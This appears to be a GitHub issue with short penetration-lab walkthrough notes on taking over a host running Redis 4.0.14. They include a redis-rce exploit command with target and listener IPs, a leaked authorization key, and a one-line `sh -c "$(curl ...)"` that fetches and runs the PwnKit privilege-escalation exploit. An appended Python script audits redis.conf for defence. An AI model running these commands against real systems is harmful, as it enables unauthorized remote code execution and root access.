Open WDavid404 opened 4 months ago
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0)
6379/tcp open redis syn-ack ttl 61 Redis key-value store 4.0.14
Search exploit redis 4.0 ---> Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit) https://www.exploit-db.com/exploits/47195 ---> but it is for metasploit...
https://github.com/Ridter/redis-rce https://github.com/jas502n/Redis-RCE
python3 redis-rce.py -r 192.168.203.176 -L 192.168.45.182 -P 80 -f exp.so -->
There is no python, so we cannot upgrade the reverse shell... sudo -l --> but no hints..
Run linpeas: cronjob:
strings redis-status file --> Authorization Key: ClimbingParrotKickingDonkey321
run sudo /usr/local/bin/redis-status, then input the authorization key --> --> but didn't find further way to exploit it...
Try linpeas suggestion: PwnKit ---> https://github.com/ly4k/PwnKit it works.....
Keypoints:
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"
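Defender-side view of the Redis finding above, as an added example that is not part of the original notes: a small audit of a `redis.conf` body for the settings that leave a 4.x instance reachable without authentication. The sample configs, the finding labels and the choice of commands to restrict are assumptions made for illustration.

```python
import ipaddress
import shlex

# Commands to restrict on Redis 4.x (assumption: the application does not need them).
RISKY = ("MODULE", "SLAVEOF", "CONFIG")

# Constructed sample configs, not taken from the target in the notes.
WEAK_CONF = "bind 0.0.0.0\nprotected-mode no\nport 6379\n"
HARDENED_CONF = (
    "bind 127.0.0.1\nprotected-mode yes\n"
    'requirepass "PLACEHOLDER-long-random-secret"\n'
    'rename-command MODULE ""\nrename-command SLAVEOF ""\n'
    'rename-command CONFIG ""\n'
)

def _is_loopback(addr):
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False  # unparseable bind entries are treated as exposed

def audit(conf_text):
    """Return a list of findings for one redis.conf body."""
    bind, protected, password, renamed = [], True, None, set()
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, *args = shlex.split(line)
        key = key.lower()
        if key == "bind":
            bind = args
        elif key == "protected-mode" and args:
            protected = args[0].lower() == "yes"
        elif key == "requirepass" and args:
            password = args[0]
        elif key == "rename-command" and len(args) == 2:
            renamed.add(args[0].upper())
    findings = []
    exposed = any(not _is_loopback(a) for a in bind) or (not bind and not protected)
    # protected-mode only refuses remote clients when no bind and no password are set
    if exposed and not password:
        findings.append("unauthenticated-network-access")
    if not protected:
        findings.append("protected-mode-off")
    findings += [f"unrestricted:{c}" for c in RISKY if c not in renamed]
    return findings

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(conf))
```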